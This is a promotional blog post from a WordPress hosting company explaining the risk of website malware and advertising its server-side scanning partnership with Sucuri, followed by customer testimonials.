WordPress Security: The Problem, The Solution, and The Immediate Action You Should Take

Imagine that you are in the market for a new home security system. Something more than just a buzzer on a 90-second delay.

You do your research and you find two general options:

The first option, offered by the majority of the home security providers you look into, pledges to send specialized teams to your house every time you’re gone, to attempt to break in.

When you return home, they provide you with a detailed report of the vulnerabilities they found – a loose window here, an unlocked back door there – and they leave without fixing them. You have no real way of knowing if any unwanted guests came in after they left.

The second option, offered by far fewer providers, actually has a database of all known thieves that includes their signature modes of entry and what they’re likely to take.

In addition using this database to check your house for vulnerabilities and breaches, this provider also checks each room of the house one by one to let you know if it’s safe to re-enter the house when you arrive home.

Which one would you choose?

Assuming the cost of the second provider is not exorbitant – which it’s not – of course you’d choose the second option. If it’s your family’s safety at stake, a few extra bucks is well worth it, in exchange for peace of mind.

The Problem: Malware

So here’s an understatement for you: malware is a big problem on the web.

It’s a big problem for you, the website owner, because every second your site is online is another a second it’s at risk for being hacked.

And it’s a particularly huge, keep-you-up-at-night problem for us because it is our job to protect your site from these threats.

We want all of our servers and all of our customers’ WordPress sites to be safe and protected, but the threat is not a static one nor does it ever go away. This is why security on the web requires constant vigilance, the ability to be nimble, and a humble commitment to perpetual improvement.

Sites end up on our doorstep every day that have been severely hacked. It could be risky business for us to invite problems like these into our house here at Synthesis.

But it’s not, because we’re confident in our approach and in the solutions we have in place to not only de-hack a WordPress website, but also to keep it clean in the future.

We rely on a multifaceted approach to security that includes:

Minimalistic, locked-down server configurations

In-house injection blocking software

Strong relationships with security specialists like Sucuri

The importance of this last bullet cannot be understated.

Another problem is that there are a plethora of companies who say they provide external security scanning services. But in reality, few do it well … if they really do anything at all.

Many simply just do the equivalent of Option #1 in our example above: throw a bunch of injection strings at your site and provide you with a report about what they feel is a vulnerability.

You can understand why your back door being unlocked is a problem when it comes to home security. And you can easily fix it. But you have to be a computer scientist to really make sense of whatever vulnerability report gets spat out to you.

Furthermore, those who actually scan for malware are limited by their malware database. This criteria alone led us to Sucuri over a year ago. We were impressed not by the sophistication of their signature database but also by their efforts to keep it up date.

Still, hackers are not idiots. Quite the contrary. Some of the brightest and most capable minds using the web right now are, unfortunately, doing so for selfish and nefarious purposes. So there are limitations to external scanners.

For example, if you are an HVAC company and your site gets hacked, you will likely find out from a local customer who gets a browser warning of malware. Conditional malware can even be as sophisticated as to only rear its ugly head in certain geographies based on IP addresses.

Yeah. Serious stuff.

Even worse, hackers know how to avoid external scanners and even Googlebot to avoid detection.

But we don’t dwell on problems here at Synthesis. We seek solutions. And in Sucuri, we’ve found a partner that provides exactly the kind of solution that can help combat even the most advanced attacks.

The Solution: Server-Side Scanning

Server-side scanning like Sucuri’s involves a small file that allows communication with their scanners and signature base from the server side as opposed to over HTTP.

An added bonus: Sucuri does the lifting, and it is not resource intensive on the server.

At Synthesis, we actually use two of these services, one being Sucuri’s. We run it every 4-6 hours and then take action based on the results.

Web-malware continues to evolve making it challenging to detect using only HTTP fingerprinting techniques, such as the ones SiteCheck is restricted to. As such we have been working to develop a new method of scanning that allows us to better detect infections on the server and site directories, specifically backdoors that are causing and acting as entry points to the infections.

The feature was designed to compliment existing scanning capabilities improving the rate of detection such that we can more quickly detect issues before the blacklisting authorities, (i.e., Google, Bing, Norton, AVG, etc..), get the chance to impact your online reputation.

Sounds pretty great, right?

And it is. But it’s not a solution in and of itself.

Even with server-side scanners, someone has to check the results and then get rid of malware if your site is infected.

Dre Armeda, one of the co-founder’s of Sucuri, explained that they do not believe in 100% automation for clean ups. They have great tools and processes, but they also assign a security engineer to every remediation case.

“It’s important to have that oversight when dealing with folks that are in a vulnerable position,” Armeda explained.

If you run a non-WordPress website, or if you have a WordPress site but choose to host elsewhere, you can go direct with Sucuri. We highly recommend it.

And if you are not a current customer, but performance and security are important to you, I’d suggest you decide which of our hosting plans is right for you. Sign up. We’ll help you get your site cleaned up during your migration so you get a fresh start when it comes to security.

Then you’ll have peace of mind knowing someone is going through your website every day either providing the “All clear!” or fixing it until we can.

About the author

Jerod Morris

I love words. I write for Copyblogger and oversee the marketing for Synthesis. You're likely to run across me at some point in the Help Desk too, because I love getting in and interacting with our great customers. Say hi there, and let's connect on Twitter and G+.

Running a business from home with two small children, consistency is essential. I need to know my site will always be up and running. Synthesis has been like a breath of fresh air.

The team at Synthesis lives and breathes WordPress. This was the missing element from my prior hosts. Synthesis exists to help WordPress sites thrive.

Synthesis functions the same when 10 visitors browse the site as when 100,000 visitors are on it. In addition, the Synthesis support is superb - personal and specific, answering each and every query professionally but also in a friendly way. I’m glad I chose Synthesis!

Before finding Synthesis hosting I moved my high traffic site to 3 different hosts but none of them could handle the complexities of WordPress hosting. My site now loads quickly and the service I get is unheard of in this industry.

Moving to Synthesis was one of the best technology decisions we've made. Synthesis allowed us to consolidate from three other hosting providers - one with outrageous costs, one with poor security and one with poor customer service.

Each time I’ve migrated from one host to another, it’s been painful. With Synthesis, that migration pain never came — leaving me with time to focus on what I do best: run my business.

We moved a large blog with close to 10,000 posts over to the Genesis framework on a customized theme with Synthesis hosting. The process was painless, and any issues we encountered were addressed quickly and professionally.

It's easy to say I am happy customer. But truly happy customers take action and tell others to enjoy the benefits of Synthesis: focused Wordpress hosting that is blazing fast from a team that understands the needs of today's content marketers.

Before Synthesis, every time I received links from the popular sites that I had worked so hard to get, my server would crash. The Synthesis team removed that worry and did so at a price point that was appropriate for my rapidly growing site.

In Synthesis, I don’t see a hosting provider. I see a hosting partner. This is what I needed as Yoast.com continues to grow and evolve.